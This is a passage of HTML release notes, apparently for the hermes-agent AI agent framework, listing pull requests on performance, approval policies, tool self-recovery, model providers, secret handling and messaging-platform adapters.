<li>Readonly config loader at 29 call sites (28× cheaper reads); per-turn config deepcopies killed (telemetry gate 54×); one raw config.yaml parse per process; inter-tool delay removed (<a href="https://github.com/NousResearch/hermes-agent/pull/74322" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74322/hovercard">#74322</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74211" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74211/hovercard">#74211</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74228" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74228/hovercard">#74228</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64172" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64172/hovercard">#64172</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Soju06/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Soju06">@Soju06</a>)</li>
<li>Lazy heavy-SDK imports (−8-10% import cost on top of the mcp/tool-discovery diet); streaming hot loop drops per-chunk repr() (~3× cheaper accounting); cursor/memo optimizations for per-iteration history walks (<a href="https://github.com/NousResearch/hermes-agent/pull/74204" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74204/hovercard">#74204</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74194" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74194/hovercard">#74194</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74221" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74221/hovercard">#74221</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74231/hovercard">#74231</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Cold-start ~14s GIL stall during backend init mitigated; turn flush batched into one SQLite transaction; provider-capability-gated prompt cache keys (implied for api.openai.com) (<a href="https://github.com/NousResearch/hermes-agent/pull/77814" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77814/hovercard">#77814</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77619" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77619/hovercard">#77619</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77609" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77609/hovercard">#77609</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>AIAgent hot-path salvage — prompt-cache copy, reasoning-timeout precompute, lazy compressor init (<a href="https://github.com/NousResearch/hermes-agent/pull/57229" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57229/hovercard">#57229</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h3>Approvals &amp; the agent loop</h3>
<ul>
<li><code>hermes approvals suggest</code> mines approval history into allowlist proposals; operator-customizable <code>approvals.smart_policy</code>; consecutive-denial circuit breaker; cross-surface approvals mode command (<a href="https://github.com/NousResearch/hermes-agent/pull/72259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72259/hovercard">#72259</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72186" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72186/hovercard">#72186</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72203/hovercard">#72203</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63517" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63517/hovercard">#63517</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Docker/podman daemon-redirect commands require approval; session-wide runaway-loop caps for web_search + delegate_task (Claude Code-inspired) (<a href="https://github.com/NousResearch/hermes-agent/pull/71092" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71092/hovercard">#71092</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66600" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66600/hovercard">#66600</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Mid-turn redirects — user corrections steer the active turn, preserving in-flight work and the original prompt (<a href="https://github.com/NousResearch/hermes-agent/pull/63104" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63104/hovercard">#63104</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72339" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72339/hovercard">#72339</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Delegation: structured timeout/stall metadata + live per-child status in <code>/agents</code>; subagents can use <code>execute_code</code>; redacted child tool history exposed in <code>subagent_stop</code>; public subagent lifecycle API for plugins (<a href="https://github.com/NousResearch/hermes-agent/pull/72300" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72300/hovercard">#72300</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69325" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69325/hovercard">#69325</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72403" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72403/hovercard">#72403</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72501" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72501/hovercard">#72501</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Single-owner refactors for backend identity + failure-scoped skips, empty-content wire repair, call_id/reasoning sanitization, model-switch parsing (<a href="https://github.com/NousResearch/hermes-agent/pull/72505" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72505/hovercard">#72505</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73071" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73071/hovercard">#73071</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74319" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74319/hovercard">#74319</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74229" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74229/hovercard">#74229</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Labeled reasoning excerpt surfaced at the empty-response terminal; tool_search probe-validates blind tool_call args (<a href="https://github.com/NousResearch/hermes-agent/pull/65144" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65144/hovercard">#65144</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59267" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59267/hovercard">#59267</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Tool self-recovery wave</h3>
<ul>
<li>Terminal: recoverable truncation (full output spilled + pre-truncation size), cwd echoed when a command changes directory, output-pattern failure hints (<a href="https://github.com/NousResearch/hermes-agent/pull/77041" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77041/hovercard">#77041</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77004" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77004/hovercard">#77004</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76992" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76992/hovercard">#76992</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Patch: already-applied edits return success no-op, whitespace-visualized no-match diagnosis, ambiguous-match locations listed (<a href="https://github.com/NousResearch/hermes-agent/pull/76998" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76998/hovercard">#76998</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77024" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77024/hovercard">#77024</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77001" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77001/hovercard">#77001</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Search: zero-match probes + multi-path recovery, auto-multiline for newline patterns; read_file default limit 500 → 2000 lines; negative-result cache for read/search misses; write_file verifies on-disk content (<a href="https://github.com/NousResearch/hermes-agent/pull/77011" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77011/hovercard">#77011</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77102/hovercard">#77102</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76996" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76996/hovercard">#76996</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76945" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76945/hovercard">#76945</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77055" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77055/hovercard">#77055</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>execute_code recovery hints; skill_view dedup stub for unchanged re-reads; terminal/execute_code schema prose trimmed ~40%; tiered tool disclosure scales with catalog size; default iteration limit 90 → 500 (<a href="https://github.com/NousResearch/hermes-agent/pull/77106" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77106/hovercard">#77106</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77095" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77095/hovercard">#77095</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77023" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77023/hovercard">#77023</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67034" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67034/hovercard">#67034</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/72176" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72176/hovercard">#72176</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Providers &amp; models</h3>
<ul>
<li>Vercel AI Gateway provider + Vercel Sandbox terminal backend return, modernized (SDK 0.7.2, telemetry off) (<a href="https://github.com/NousResearch/hermes-agent/pull/74518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74518/hovercard">#74518</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Gemini 3.1 Pro + 3.6 Flash in catalogs; Gemini salvage cluster (3.6-flash aux default, Vertex catalog, direct cost tracking); claude-opus-5 in OpenRouter + Nous Portal; deepseek-v4-flash-0731 (<a href="https://github.com/NousResearch/hermes-agent/pull/73479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73479/hovercard">#73479</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73516" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73516/hovercard">#73516</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70946" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70946/hovercard">#70946</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75501" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75501/hovercard">#75501</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Bedrock Converse API prompt caching (cachePoint) (<a href="https://github.com/NousResearch/hermes-agent/pull/70231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70231/hovercard">#70231</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>)</li>
<li>OpenAI data-residency endpoints get declared transport + correct catalog; provider-aware API-server request routing; backend-acknowledged session model lock; Nous sticky routing via top-level session_id (<a href="https://github.com/NousResearch/hermes-agent/pull/74958" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74958/hovercard">#74958</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70853" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70853/hovercard">#70853</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70950" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70950/hovercard">#70950</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69253" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69253/hovercard">#69253</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/victor-kyriazakos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/victor-kyriazakos">@victor-kyriazakos</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Model picker: curated defaults + collapsible providers + select-all; stale caches served instantly with background refresh; custom-endpoint probe capped at 1.5s; honcho OAuth device-code login (<a href="https://github.com/NousResearch/hermes-agent/pull/73172" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73172/hovercard">#73172</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76430" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76430/hovercard">#76430</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76922" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76922/hovercard">#76922</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61608" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61608/hovercard">#61608</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akattelu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akattelu">@akattelu</a>)</li>
<li>ACP: named custom providers in the model selector; authenticated cross-provider model choices; non-blocking startup via background MCP discovery (<a href="https://github.com/NousResearch/hermes-agent/pull/70082" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70082/hovercard">#70082</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70404" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70404/hovercard">#70404</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/75985" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/75985/hovercard">#75985</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/israellot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/israellot">@israellot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amanning3390/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amanning3390">@amanning3390</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h3>Secrets &amp; config</h3>
<ul>
<li>Command-helper secret source (composes with all vaults); one-command token rotation + actionable startup errors; opt-in encrypted break-glass cache for Bitwarden; vault-injected keys scoped per profile home; orchestrator preserve_existing + profile aliasing (<a href="https://github.com/NousResearch/hermes-agent/pull/69266" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69266/hovercard">#69266</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68605" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68605/hovercard">#68605</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69251" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69251/hovercard">#69251</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69250" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69250/hovercard">#69250</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69058" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69058/hovercard">#69058</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><code>${env:VAR}</code> SecretRef parity between config.yaml and MCP config; secret-source env vars reach stdio MCP servers (<a href="https://github.com/NousResearch/hermes-agent/pull/69267" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69267/hovercard">#69267</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69053" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69053/hovercard">#69053</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Canonical config loaders for behavioral reads; table-driven config migration registry; DEFAULT_CONFIG extracted to config_defaults.py; auto-migration support floor at v12 (<a href="https://github.com/NousResearch/hermes-agent/pull/74237" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74237/hovercard">#74237</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74200" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74200/hovercard">#74200</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74182/hovercard">#74182</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74433" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74433/hovercard">#74433</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🌐 Gateway, Relay &amp; Fleet</h2>
<ul>
<li>Session activity heartbeats, stall watchdog, and bounded compression waits — re-landed hardened after an in-window revert cycle (originally <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4983942630" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/72424" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/72424/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/72424">#72424</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fangliquanflq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fangliquanflq">@fangliquanflq</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/76354" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76354/hovercard">#76354</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>SessionState consolidation (19 session-keyed dicts → one turn/conversation/persistent-scoped object); TurnContext/TurnRunner seam extraction; declarative busy_policy on CommandDef (<a href="https://github.com/NousResearch/hermes-agent/pull/74289" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74289/hovercard">#74289</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74353" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74353/hovercard">#74353</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74197" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74197/hovercard">#74197</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Relay parity waves: Phase 1 (supported_ops discovery, identity fields, /handoff aliasing), Phase 2 media, Phase 3 interactive prompts, Phase 4 thread lifecycle; egress typing indicators (<a href="https://github.com/NousResearch/hermes-agent/pull/71300" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71300/hovercard">#71300</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71363" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71363/hovercard">#71363</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71404" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71404/hovercard">#71404</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/71624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71624/hovercard">#71624</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69721" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69721/hovercard">#69721</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>HSP skill sync: personal client (M1) + org-skills client (M2) + org-skill namespace with token-gated discovery (<a href="https://github.com/NousResearch/hermes-agent/pull/66730" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66730/hovercard">#66730</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70024" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70024/hovercard">#70024</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70459" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70459/hovercard">#70459</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Buzz (Block/Nostr) platform adapter with native WebSocket inbound transport + NIP-42 auth (<a href="https://github.com/NousResearch/hermes-agent/pull/73610" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73610/hovercard">#73610</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73761" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73761/hovercard">#73761</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Photon: native polls, effects, clarify-as-poll, rich links (4-PR salvage) (<a href="https://github.com/NousResearch/hermes-agent/pull/73614" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73614/hovercard">#73614</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Slack: native Block Kit clarify buttons; opt-in reaction triggers; outbound payload sanitization; thread-context lifecycle fixes (<a href="https://github.com/NousResearch/hermes-agent/pull/69318" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69318/hovercard">#69318</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/70195" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70195/hovercard">#70195</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69317" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69317/hovercard">#69317</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69320" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69320/hovercard">#69320</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Discord auto-thread sessions keyed on prospective_thread_id; reply references built from ids (no fetch_message); WhatsApp configurable inbound read receipts (<a href="https://github.com/NousResearch/hermes-agent/pull/76513" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76513/hovercard">#76513</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/76875" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/76875/hovercard">#76875</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73322" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73322/hovercard">#73322</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
